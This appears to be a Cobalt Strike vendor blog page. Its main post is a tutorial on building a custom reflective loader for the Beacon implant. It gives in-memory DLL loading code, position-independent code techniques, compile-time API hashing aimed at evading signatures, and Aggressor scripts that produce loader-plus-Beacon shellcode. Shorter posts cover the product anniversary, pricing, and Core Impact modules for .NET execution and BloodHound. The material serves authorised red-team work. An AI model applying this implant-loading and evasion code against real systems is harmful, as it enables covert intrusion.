Revisiting the User-Defined Reflective Loader Part 1: Simplifying Development

 

This blog post accompanies a new addition to the Arsenal Kit – The User-Defined Reflective Loader Visual Studio (UDRL-VS). Over the past few months, we have received a lot of feedback from our users that whilst the flexibility of the UDRL is great, there is not enough information/example code to get the most out of this feature. The intention of this kit is to lower the barrier to entry for developing and debugging custom reflective loaders. This post includes a walkthrough of creating a UDRL in Visual Studio that facilitates debugging, an introduction to UDRL-VS, and an overview of how to apply a UDRL to Beacon.

Note: There are many people out there that prefer to use tools such as MinGW/GCC/LD/GDB etc. and we salute you. However, this post is intended for those of us that like the simplicity of Visual Studio and enjoy a GUI. To develop this template we used Visual Studio Community 2022.

Reflective Loading

Beacon is just a Dynamic Link Library (DLL). As a result, it needs to be “loaded” for us to work with it. There are many different ways to load a DLL in Windows, but Reflective DLL Injection, first published by Stephen Fewer in 2008, provides the means to load a DLL completely in memory. There is a lot of information available regarding PE files, reflective loading, and even improving upon Reflective DLL Injection. Therefore, this post will not delve into this in much detail. Fundamentally though, a reflective loader must do the following (see the sketch after this list):

  • Allocate some memory.
  • Copy the target DLL into that memory allocation.
  • Parse the target DLL’s imports/load the required modules/resolve function addresses.
  • Rebase the DLL (fix the relocations).
  • Locate the DLL’s Entry Point.
  • Execute the Entry Point.
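
To make these steps concrete, the following is a deliberately simplified sketch in ordinary (non-position-independent) C++. All names are our own; it is x64 only, uses RWX memory, has no error handling, and assumes imports by name, so treat it as an illustration of the list above rather than real loader code. A real reflective loader cannot call LoadLibraryA()/GetProcAddress() by name like this; it has to resolve everything itself.

#include <windows.h>
#include <cstring>

typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);

void* ReflectiveLoadSketch(const BYTE* rawDll)
{
    auto* dos = (IMAGE_DOS_HEADER*)rawDll;
    auto* nt = (IMAGE_NT_HEADERS*)(rawDll + dos->e_lfanew);

    // 1. Allocate some memory.
    BYTE* base = (BYTE*)VirtualAlloc(NULL, nt->OptionalHeader.SizeOfImage,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // 2. Copy the target DLL into that memory allocation (headers, then sections).
    memcpy(base, rawDll, nt->OptionalHeader.SizeOfHeaders);
    auto* section = IMAGE_FIRST_SECTION(nt);
    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, section++)
        memcpy(base + section->VirtualAddress, rawDll + section->PointerToRawData, section->SizeOfRawData);

    // 3. Parse the imports, load the required modules, resolve function addresses.
    auto* importDesc = (IMAGE_IMPORT_DESCRIPTOR*)(base +
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
    for (; importDesc->Name; importDesc++) {
        HMODULE module = LoadLibraryA((char*)(base + importDesc->Name));
        auto* thunk = (IMAGE_THUNK_DATA*)(base + importDesc->FirstThunk);
        auto* nameRef = (IMAGE_THUNK_DATA*)(base + importDesc->OriginalFirstThunk);
        for (; nameRef->u1.AddressOfData; thunk++, nameRef++) {
            auto* byName = (IMAGE_IMPORT_BY_NAME*)(base + nameRef->u1.AddressOfData);
            thunk->u1.Function = (ULONG_PTR)GetProcAddress(module, byName->Name);
        }
    }

    // 4. Rebase the DLL: apply each relocation using the delta from the preferred base.
    ULONG_PTR delta = (ULONG_PTR)base - nt->OptionalHeader.ImageBase;
    auto& relocDir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    auto* block = (IMAGE_BASE_RELOCATION*)(base + relocDir.VirtualAddress);
    DWORD parsed = 0;
    while (parsed < relocDir.Size) {
        WORD* entry = (WORD*)(block + 1);
        DWORD count = (block->SizeOfBlock - sizeof(*block)) / sizeof(WORD);
        for (DWORD i = 0; i < count; i++)
            if ((entry[i] >> 12) == IMAGE_REL_BASED_DIR64)
                *(ULONG_PTR*)(base + block->VirtualAddress + (entry[i] & 0xFFF)) += delta;
        parsed += block->SizeOfBlock;
        block = (IMAGE_BASE_RELOCATION*)((BYTE*)block + block->SizeOfBlock);
    }

    // 5/6. Locate the DLL's Entry Point and execute it.
    auto entryPoint = (DLLMAIN)(base + nt->OptionalHeader.AddressOfEntryPoint);
    entryPoint((HINSTANCE)base, DLL_PROCESS_ATTACH, NULL);
    return base;
}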

In Stephen Fewer’s original implementation, the code used to load the DLL into memory is compiled into the DLL and “exported” as a function. This is how Beacon’s default reflective loader works; if you inspect Beacon’s exported functions you’ll find one called ReflectiveLoader() which is where the magic happens. The following screenshot shows Beacon’s Export Address Table (EAT) and its ReflectiveLoader() function in CFF Explorer.

Figure 1. Beacon’s Export Address Table in CFF Explorer.

Note: Typically, when a reflective loader is implemented in this fashion, a small shellcode stub is also written to the start of the PE file (over the DOS header) to ensure that execution is correctly directed to the right place (the ReflectiveLoader() function). This is what makes it position independent as it’s possible to simply write the reflective DLL to memory, start a thread and let it run.

In 2017, an analysis of the Double Pulsar User Mode Injector (Double Pulsar) leaked by Shadow Brokers showed an alternate approach to reflective loading (archive link). Double Pulsar differed because it was not compiled into the DLL but prepended in front of it. This approach allowed it to reflectively load any DLL. Later in 2017, the Shellcode Reflective DLL Injection (sRDI) project was released which used a similar approach. sRDI is able to take an arbitrary PE file and make it position independent which means it can also be used to load Beacon.

The following high-level diagram shows the different locations of the reflective loader between Stephen Fewer’s approach and Double Pulsar.

Figure 2. The different locations of ReflectiveLoader().

The User-Defined Reflective Loader (UDRL)

The UDRL is an important aspect of Cobalt Strike’s evasion strategy. Cobalt Strike achieves “evasion through flexibility”, meaning we give you the tools you need to modify default behaviors and customize Beacon to your liking. This was something that Raphael Mudge felt strongly about and will remain a key part of the Cobalt Strike strategy moving forward.

As described above, Beacon’s default ReflectiveLoader() is compiled into Beacon and exported. As a result, the UDRL was originally intended to work in the same fashion. The Teamserver would take a given UDRL and use it to overwrite Beacon’s default ReflectiveLoader() function. A great example of a UDRL that utilizes this workflow is BokuLoader by Bobby Cooke.

In this blog post, we’ll be exploring the same approach used by Double Pulsar and will therefore append Beacon to our loader as shown in Figure 2. TitanLdr by Austin Hudson is an excellent example of a UDRL that uses this approach. AceLdr by Kyle Avery is another very good example that also includes some additional functionality for avoiding memory scanners.

There are likely many other UDRLs available, and without a doubt even more that have not been made public. The above projects have been mentioned as they are impressive public examples. If you’ve developed a UDRL for Cobalt Strike yourself and you’d like to share it, you can submit it to the Cobalt Strike Community Kit.

Enter Visual Studio

The original UDRL example provided in the Arsenal Kit is a slightly modified version of Stephen Fewer’s reflective loader, so here we’ll also start in the same place. To save a lot of unnecessary content, we will not cover the process of creating an empty Visual Studio project and copy/pasting code. The only difference at this stage is that our project files were created with the .cpp extension. This minor change to .cpp allows the project to access some additional functionality (more on this later). For clarity, the folder layout of the project after copy/pasting Stephen Fewer’s code has been illustrated below.

UDRL-VS/
├── Header Files/
│ ├── ReflectiveDLLInjection.h
│ └── ReflectiveLoader.h
└── Source Files/
  └── ReflectiveLoader.cpp

The purpose of this Visual Studio project is to create a PE executable file that contains our reflective loader. This executable file can then be compiled in either Debug mode or Release mode. In Debug mode it can be used in combination with Visual Studio’s debugger to step through the code and debug our loader. In Release mode, we can strip our loader out of the resulting executable and prepend it to Beacon to create a Double Pulsar style payload as illustrated in Figure 2.

To compile the project and ensure that it executes correctly, we need to change some of Visual Studio’s Project Settings. These have been outlined below:

  • Entry Point (ReflectiveLoader) – This setting changes the default starting address to Stephen Fewer’s ReflectiveLoader() function. A custom entry point would normally be problematic for a traditional PE file and require some manual initialization. However, Stephen Fewer’s code is position independent, so this won’t be a problem.
  • Enable Intrinsic Functions (Yes) – Intrinsic functions are built into the compiler and make it possible to “call” certain assembly instructions. These functions are “inlined” automatically which means the compiler inserts them at compile time.
  • Ignore All Default Libraries (Yes) – This setting will alert us when we call external functions (as that would not be position independent).
  • Basic Runtime Checks (Default) – This setting is configured correctly in Release mode by default, but changing it in the Debug configuration disables some runtime error checking that will throw an error due to our custom entry point.
  • Optimization – We’ve enabled several of Visual Studio’s different Optimization settings and opted to favor smaller code where possible. However, at certain points in the template we’ve disabled it to ensure our code works as expected.

Note: Optimization can be great because it makes our code smaller and faster. However, it’s important to know what can be optimized and what can’t, which is made even more complex when writing position independent code. If you run into problems, it can be worth checking whether something is being optimized away by the compiler.

Function Positioning

In this post, we are using the Double Pulsar approach to reflective loading. Therefore, after compiling the Release build, we will extract the loader from the resulting executable and prepend it to Beacon to create our payload. As part of this model, we need to ensure that the loader’s entry point sits at the very start of the shellcode. We also need to make sure that we can identify the end of the loader in order to find out where Beacon begins. This has been illustrated in the following high-level diagram:

Figure 3. A high-level overview of Function Positioning.

There are different ways to achieve this “positioning”; however, for the purposes of this template we have used the code_seg pragma directive. code_seg can be used to specify which section is used to store specific functions. These sections can then be ordered using alphabetical values, e.g. .text$a. This works because the linker splits each section name at the first dollar sign and uses the value after it to sort the sections, which facilitates the alphabetical ordering. A similar approach to function ordering can also be seen in both TitanLdr/AceLdr in link.ld.

In the example below, we have placed the ReflectiveLoader() function within .text$a to ensure that it is positioned at the start of the .text section and therefore the start of the payload. The remaining functions in ReflectiveLoader.cpp have been placed inside .text$b to ensure that they are located after ReflectiveLoader(). The compiler can order the functions within a given section however it chooses, so this approach of using $a and $b enforces the required layout.

#pragma code_seg(".text$a")
ULONG_PTR WINAPI ReflectiveLoader(VOID) {
[…SNIP…]
}
#pragma code_seg(".text$b")
[…SNIP…]

Note: In some public examples of reflective loaders, a small shellcode stub is used at the very start of execution to ensure stack alignment. This approach is not explicitly required in our template at this point as the loader is intended for use with memory allocation/thread creation APIs for simplicity. It should therefore be aligned correctly. If you do require this stack alignment, it would still be possible to use a similar shellcode stub in this model but it can be left as an exercise for the reader. Matt Graeber’s Writing Optimized Windows Shellcode in C and the associated PIC_Bindshell code demonstrate this. In addition, it can also be found in TitanLdr/AceLdr in start.asm.

We can use the same approach described above to also locate the end of the loader. In the code snippet below, we have used the code_seg directive once more to position the LdrEnd() function. Previously, we used $a to position ReflectiveLoader() at the start of the .text section and here we are using $z to position LdrEnd() at the end of it.

#pragma code_seg(".text$z")
void LdrEnd() {}

The following high-level diagram illustrates the code sections described above.

Figure 4. A high-level overview of Function Positioning with alphabetical values.

The Release build is designed to work with the Teamserver which will append Beacon to our loader. As part of the Debug build, we need to simulate the Release mode behavior. The code_seg directive can also be used in combination with the __declspec(allocate()) specifier to position the contents of data items. In the example below, we use the code_seg directive to specify a section, and then use the __declspec(allocate()) specifier to place the contents of Beacon.h (unsigned char beacon_dll[]) within it. This logic was placed in End.h/End.cpp for simplicity.

#ifdef _DEBUG
#pragma code_seg(".text$z")
__declspec(allocate(".text$z"))
#include "Beacon.h"
#endif
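
Beacon.h itself is nothing more than the raw Beacon DLL expressed as a byte array. A hypothetical sketch of its contents (such an array can be generated from an exported payload with a tool like xxd -i; the name beacon_dll is the one referenced above):

// Hypothetical Beacon.h: the raw DLL as a byte array, e.g. `xxd -i beacon.x64.bin`
unsigned char beacon_dll[] = {
    0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,  // "MZ" DOS header onwards...
    /* ...the rest of the DLL's bytes... */
};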

The folder layout after adding the above files to the project has been illustrated below.

UDRL-VS/
├── Header Files/
│   ├── Beacon.h
│   ├── End.h
│   ├── ReflectiveDLLInjection.h
│   └── ReflectiveLoader.h
└── Source Files/
    ├── End.cpp
    └── ReflectiveLoader.cpp

This is the crux of our development environment: by positioning LdrEnd()/Beacon.h we’re able to easily find the location of Beacon. This change to Stephen Fewer’s original code is shown below.

#ifdef _DEBUG
    uiLibraryAddress = (ULONG_PTR)beacon_dll;
#elif _WIN64
    uiLibraryAddress = (ULONG_PTR)&LdrEnd + 1;
[…SNIP…]
#endif

Note: The x86 version of the Release build works in a slightly different fashion from the one described above. Positioning LdrEnd() and referencing its address works in x64 because the compiler identifies it using relative addressing. Disassembling the binary shows a “load effective address” at [rip + offset] (LEA RSI,[RIP+0X6B9]). This approach does not work in x86 because the absolute address of LdrEnd() is calculated at compile time. Therefore, it points to a completely incorrect location when the loader is prepended to Beacon (MOV EBX, 0X401600). To provide support for x86, we recycled Stephen Fewer’s caller() function in our template and renamed it to GetLocation(). This function simply returns the calling function’s return address via the _ReturnAddress() intrinsic function. Instead of referencing the address of LdrEnd() in x86, we call it, which in turn calls GetLocation(). We then use simple pointer arithmetic to work out the location of Beacon. We could have used this approach for both x86 and x64 but kept both to highlight the difference between them.
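
For reference, the renamed helper is essentially unchanged from Stephen Fewer’s original; a sketch:

#include <windows.h>
#include <intrin.h>

// GetLocation(): Stephen Fewer's caller(), renamed. __declspec(noinline) is
// essential; if the function were inlined there would be no call and
// therefore no return address to read.
#pragma intrinsic(_ReturnAddress)
__declspec(noinline) ULONG_PTR GetLocation(VOID)
{
    return (ULONG_PTR)_ReturnAddress();
}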

At this point, we now have an operational Debug build. We can set a breakpoint, click “Local Windows Debugger”, and use all the features of Visual Studio’s debugger.

The UDRL-VS Kit

In the previous section we used Stephen Fewer’s original reflective DLL injection code to show that only minor modifications were required to get up and running. However, we wanted to take this a step further and provide a template to support developing and debugging UDRLs for Cobalt Strike.

As part of creating this template, we have attempted to simplify Stephen Fewer’s original code by splitting it into separate functions, removing unused code, updating types and providing more descriptive variable names. In addition, we have also provided some helper functions to speed up writing position independent code (PIC). The following sections provide an overview of these helper functions. For additional help writing PIC, there is an excellent public framework available called ShellcodeStdio that also demonstrates the techniques described below.

Compile Time Hashing

In Stephen Fewer’s original code, several hashes had been pre-calculated and included in ReflectiveLoader.h. This solution works well, but to simplify it further and make it easier for you to include your own hashes, we have added “compile time hashing”.

As the CPP reference states, the “constexpr” specifier makes it possible to “evaluate the value of a function or variable at compile time”. Therefore, it is possible to use the constexpr specifier as part of a hash function to ensure that the hash is generated at compile time. This means instead of pre-calculating hashes and including them in our header file, we can have the compiler/preprocessor hash our strings for us.

Note: Compile time hashing will help us more in a subsequent post, but at this point, an added benefit is that it makes it easier to rotate Stephen Fewer’s HASH_KEY value used to hash the strings. It is not a silver bullet but changing the HASH_KEY could help to push back on simple static signatures.

In the template, we have replaced Stephen Fewer’s static hash values with calls to CompileTimeHash().

constexpr DWORD KERNEL32DLL_HASH = CompileTimeHash("kernel32.dll");
constexpr DWORD NTDLLDLL_HASH = CompileTimeHash("ntdll.dll");

constexpr DWORD LOADLIBRARYA_HASH = CompileTimeHash("LoadLibraryA");
constexpr DWORD GETPROCADDRESS_HASH = CompileTimeHash("GetProcAddress");
constexpr DWORD VIRTUALALLOC_HASH = CompileTimeHash("VirtualAlloc");
constexpr DWORD NTFLUSHINSTRUCTIONCACHE_HASH = CompileTimeHash("NtFlushInstructionCache");
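
The template’s actual implementation isn’t reproduced here, but a minimal constexpr hash might look like the following sketch (a ROR13-style routine in the spirit of Stephen Fewer’s hash(); names and constants are assumed):

#include <windows.h>

constexpr DWORD HASH_KEY = 13; // rotation value; changing it changes every hash

constexpr char ToUpperChar(char c)
{
    return (c >= 'a' && c <= 'z') ? c - ('a' - 'A') : c;
}

constexpr DWORD CompileTimeHash(const char* string)
{
    DWORD hash = 0;
    while (*string) {
        hash = (hash >> HASH_KEY) | (hash << (32 - HASH_KEY)); // ror 13
        hash += ToUpperChar(*string++); // normalize case before folding in
    }
    return hash;
}

Because each call is a constant expression, only the numeric hash should be baked into the binary; when fully evaluated at compile time, the plaintext string never needs to survive into the final payload.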

Note: We have also modified the original hash() function in the template to normalize strings to uppercase before hashing so that “lOadLiBrarYa” and “LoadLibraryA” result in the same hash.

PRINT()

It can be helpful to print strings as part of debugging, but as we mentioned earlier, a custom entry point can affect startup routines, etc. This means that at the start of execution we do not have direct access to the C/C++ standard library or any Windows APIs.

As part of simplifying Stephen Fewer’s original code, we broke it down into independent functions. As a result, we now have a GetProcAddressByHash() function in Utils.cpp that we can use to resolve function addresses. To save a lot of time and effort we have used this to create a _printf() function for Debug purposes and included it in our template. This _printf() function works in the same way as the original printf() so you can give it format specifiers and use it to print variables, etc. We also wrapped it into a macro called PRINT() which will only generate the _printf() calls when the project is compiled in Debug mode.
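
A minimal sketch of how such a macro can be defined (the template’s actual definition may differ):

#ifdef _DEBUG
#define PRINT(...) _printf(__VA_ARGS__)
#else
#define PRINT(...) do {} while (0) // compiles away entirely in Release
#endif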

PRINT("[+] Beacon Start Address: %p\n", beaconBaseAddress);

Here is a screenshot of the above function in action. We have printed the location of Beacon and then found it using the disassembly view in Visual Studio.

Figure 5. Finding Beacon’s MZ Header with a call to PRINT().

Strings

Strings are saved into the .data/.rdata section of a PE file and will therefore be unavailable once we extract the loader (which will be exclusively found in the .text section). It’s therefore important to understand how strings are created and stored within a PE file. Compiler Explorer is an excellent website for seeing how your code is assembled and even color codes the input/output. The following screenshot shows three different approaches to declaring strings in C++.

Figure 6. A demonstration of how strings are created and stored with Compiler Explorer.

The first declaration uses an array initializer; this has been highlighted in yellow. The output window shows how move instructions are used to construct the string one byte at a time. This means that all the code is found within the .text section.

The next approach uses a string literal to initialize the data. As shown in the purple output, the bytes of the string are copied into the array from the .data section. This has been broken down and explained below.

lea    rax, QWORD PTR string$[rsp]     ; load the address of where the string will be on the stack (destination address)
lea    rcx, OFFSET FLAT : $SG2657      ; load the address of the string in the .data section (source address)
mov    rdi, rax                        ; save destination address into destination index register (RDI)
mov    rsi, rcx                        ; save source address into source index register (RSI)
mov    ecx, 12                         ; save the size of the string into the count register (ECX)
rep    movsb                           ; copy a single byte from [RSI] to [RDI] and repeat ECX times (the size of the string)

In the final example, a char pointer is initialized with a string literal. As shown in the red output, it references the value in the .data section. This has also been broken down and explained below.

lea    rax, OFFSET FLAT:$SG2658        ; load the address of the string in the .data section
mov    QWORD PTR stringPtr$[rsp], rax  ; save the address of the string on the stack

After reviewing the above, we can see the only real option for us when writing PIC is to either avoid using strings (not always possible) or use the first approach in the example above.

char helloWorld[] = {'H','e','l','l','o',' ','W','o','r','l','d','\0'};

As with everything when writing PIC, this is a little clumsy and cumbersome. However, Evan McBroom has provided a very simple and elegant solution to this problem. Evan discovered that when using the constexpr specifier to initialize a char array with a string literal, the resulting string was constructed in the same fashion as the array initializer described above. The following screenshot demonstrates this with Compiler Explorer.

Figure 7. A demonstration of Evan McBroom’s PIC string with Compiler Explorer.

Evan wrapped this into two macros that can be used to create both ASCII strings and wide strings.

#define PIC_STRING(NAME, STRING) constexpr char NAME[]{ STRING }
#define PIC_WSTRING(NAME, STRING) constexpr wchar_t NAME[]{ STRING }

We have added these two macros to the template, as shown in the following example.

PIC_STRING(example, "[!] Hello World\n");
PRINT(example);

Release Mode

The ability to develop and debug inside Visual Studio is great, but what about using this loader in production? The great thing about writing a PIC loader is that everything we need is located inside the resulting PE file’s .text section. This means we can use a simple Python script to extract our compiled executable’s .text section and voila, we have our UDRL!

Note: This is why we used the “Function Positioning” described earlier. We needed to ensure that our ReflectiveLoader() function was positioned correctly at the very start of the .text section, which becomes the very start of the UDRL (aka the loader).

There are many examples of Python scripts that do something similar; both TitanLdr and AceLdr have similar scripts in their respective repositories. We have also included a script in the Arsenal Kit template called udrl.py. Visual Studio allows us to incorporate this script as a post-build event and so the Release build will automatically create udrl-vs.bin in the relevant Output Directory.
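
To make the extraction step concrete, here is a minimal sketch of the idea in C++ (udrl.py itself is a Python script; the names and error handling below are assumed, and SizeOfRawData includes file-alignment padding that a real script may trim):

#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <cstdio>
#include <cstring>
#include <vector>

int main(int argc, char** argv)
{
    if (argc != 3) { std::printf("usage: extract <in.exe> <out.bin>\n"); return 1; }

    // Read the compiled executable into memory.
    FILE* in = std::fopen(argv[1], "rb");
    if (!in) return 1;
    std::fseek(in, 0, SEEK_END);
    long size = std::ftell(in);
    std::fseek(in, 0, SEEK_SET);
    std::vector<unsigned char> buffer(size);
    std::fread(buffer.data(), 1, size, in);
    std::fclose(in);

    // Walk the section headers looking for .text.
    auto* dos = (IMAGE_DOS_HEADER*)buffer.data();
    auto* nt = (IMAGE_NT_HEADERS*)(buffer.data() + dos->e_lfanew);
    auto* section = IMAGE_FIRST_SECTION(nt);
    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, section++) {
        if (std::memcmp(section->Name, ".text", 6) == 0) {
            // Thanks to the function positioning described earlier,
            // ReflectiveLoader() sits at the very start of these bytes.
            FILE* out = std::fopen(argv[2], "wb");
            std::fwrite(buffer.data() + section->PointerToRawData, 1,
                        section->SizeOfRawData, out);
            std::fclose(out);
            std::printf("[+] Extracted %lu bytes\n", section->SizeOfRawData);
            return 0;
        }
    }
    return 1;
}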

To simplify testing and development, udrl.py also facilitates shellcode execution. This allows you to quickly test the loader without having to go via the Teamserver. We’d strongly recommend using this frequently to test your work. When writing PIC, things will often work in Debug mode but not in Release mode. For example, you can easily be caught out by forgetting the constexpr specifier, by forgetting to initialize pointers, or by using strings that aren’t PIC.

C:\> py.exe udrl.py prepend-udrl .\beacon.x64.bin .\x64\Release\udrl-vs.exe

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1229
[+] Start Address: 0x1b690d90000
[+] Shellcode Executed

Note: Make sure to use the 32-bit version of Python when testing x86 loaders. It will save you a couple of minutes of confusion…

Previously we used the Double Pulsar approach to loading because it simplified our Development/Debugging and provided an alternate way to write a UDRL. However, there is no reason why we can’t still use the “original” UDRL workflow and simply replace Beacon’s default loader with the one we have created.

The UDRL-VS template contains an additional Build Configuration called “Release (Stephen Fewer)”. This Build Configuration still creates the same PIC loader, however, instead of using the LdrEnd() function to calculate the location of Beacon, it uses Stephen Fewer’s original approach of walking backward through memory to find the start address of the DLL that is being loaded (Beacon).

To make it easy to test this type of loader, we have also included an option in udrl.py to overwrite Beacon’s default loader and execute the resulting payload.

C:\> py.exe udrl.py stomp-udrl .\beacon.x64.bin ".\x64\Release (Stephen Fewer)\udrl-vs.exe"

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1277
[*] Found ReflectiveLoader - RVA: 0x17aa4       File Offset: 0x16ea4
[+] Success: Applied UDRL to DLL
[+] Start Address: 0x27239a20000
[+] Shellcode Executed

Once your loader has been tested and works as expected, it can be used in combination with an Aggressor Script to make it operational. We don’t strictly need to use Aggressor; we could use a script like udrl.py to create the payload. However, Aggressor Script has several functions that will simplify customization in subsequent posts and save us writing extra code.

We can use some very simple Aggressor Scripts to apply our loaders to Beacon. The following example demonstrates how to append Beacon to our loader (almost a carbon copy of the one used by TitanLdr/AceLdr).

set BEACON_RDLL_GENERATE {
    # Declare local variables
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Check the payload architecture
    if ($arch eq "x64") {
        $path = getFileProper(script_resource("x64"), "Release", "udrl-vs.bin");
    }
    else if ($arch eq "x86") {
        $path = getFileProper(script_resource("Release"), "udrl-vs.bin");
    }
    else {
        warn("Error: Unsupported architecture: $arch");
        return $null;
    }

    # Read the UDRL from the supplied binary file
    $fileHandle = openf($path);
    $ldr = readb($fileHandle, -1);
    closef($fileHandle);
    if (strlen($ldr) == 0) {
        warn("Error: Failed to read udrl-vs.bin");
        return $null;
    }

    # Prepend UDRL to Beacon and output the modified payload.
    return $ldr . $beacon;
}

The following example demonstrates how to overwrite Beacon’s default loader with our own. We still read the loader in the same fashion, but this time we call setup_reflective_loader(). This function does the heavy lifting for us; it finds the current ReflectiveLoader() function in Beacon and replaces it with the one provided.

set BEACON_RDLL_GENERATE {
    # Declare local variables
    local('$arch $beacon $fileHandle $ldr $path $payload');
    $beacon = $2;
    $arch = $3;

    # Check the payload architecture.
    if ($arch eq "x64") {
        $path = getFileProper(script_resource("x64"), "Release (Stephen Fewer)", "udrl-vs.bin");
    }
    else if ($arch eq "x86") {
        $path = getFileProper(script_resource("Release (Stephen Fewer)"), "udrl-vs.bin");
    }
    else {
        warn("Error: Unsupported architecture: $arch");
        return $null;
    }

    # Read the UDRL from the supplied binary file
    $fileHandle = openf($path);
    $ldr = readb($fileHandle, -1);
    closef($fileHandle);
    if (strlen($ldr) == 0) {
        warn("Error: Failed to read udrl-vs.bin");
        return $null;
    }

    # Overwrite Beacon's ReflectiveLoader() with the UDRL
    $payload = setup_reflective_loader($beacon, $ldr);

    # Output the modified payload.
    return $payload;
}

If we load either of the scripts above into Cobalt Strike and export a payload, we’ll see a message in the Script Console confirming that the custom loader was used. The resulting shellcode can then be used in combination with a Stage0 of your choosing.

Closing Thoughts

That concludes the first post of this series, Revisiting the UDRL. As part of this post we have created a Visual Studio project with several Quality of Life (QoL) improvements. We’re now able to develop, debug, and operationalize both Stephen Fewer’s original reflective loader and the Double Pulsar concept for Cobalt Strike using Visual Studio. The template developed as part of this project can be found in the Arsenal Kit under udrl-vs in “kits”. In the next installment we’ll explore some evasive techniques as well as how to modify default behaviors.

Celebrating 10 Years of Cobalt Strike

 

Can you believe it? Cobalt Strike is 10 years old! Think back to the summer of 2012. The Olympics were taking place in London. CERN announced the discovery of a new particle. The Mars Rover, Curiosity, successfully landed on the red planet. And despite the numerous eschatological claims of the world ending by December, Raphael Mudge diligently worked to create and debut a solution unique to the cybersecurity market.

Raphael designed Cobalt Strike as a big brother to Armitage, his original project that served as a graphical cyber-attack management tool for Metasploit. Cobalt Strike quickly took off as an advanced adversary emulation tool ideal for post-exploitation exercises by Red Teams.

Flash forward to 2022 and not only is the world still turning, Cobalt Strike continues to mature, having become a favorite tool of top cybersecurity experts. The Cobalt Strike team has also grown accordingly, with more members than ever working on research activities to further add features, enhance security, and fulfill customer requests. With version 4.7 nearly ready, we’re eager to show you what we’ve been working on.

However, we’d be remiss not to take a moment to pause and thank the Cobalt Strike user community for all you’ve done to contribute over the years to help this solution evolve. But how could we best show our appreciation? A glitter unicorn card talking about “celebrating the journey”? A flash mob dance to Hall & Oates’ “You Make My Dreams Come True”? Hire a plane to write “With users like you, we’ve Cobalt Struck gold!”? It turns out that it is very difficult to express gratitude in a non-cheesy way, but we’ve tried our best with the following video:


Building Upon a Strong Foundation

 

In the weeks ahead, Cobalt Strike 4.6 will go live and will be a minor foundational release before we move into our new development model. This release will be less about features and is more focused on bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment comes additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customer renewals. The price of Cobalt Strike for new licenses and customers will be $5,900 per user ($3,540 when bundled with other offensive security products) for a one-year license.*

The pricing for the Offensive Security – Advanced Bundle of Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

*US Pricing Only

Incorporating New Tools into Core Impact

 

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement. Additionally, these two solutions can be bundled together.

Some modules used by Cobalt Strike can now be used within Core Impact.

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the usage of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. BloodHound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned with Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

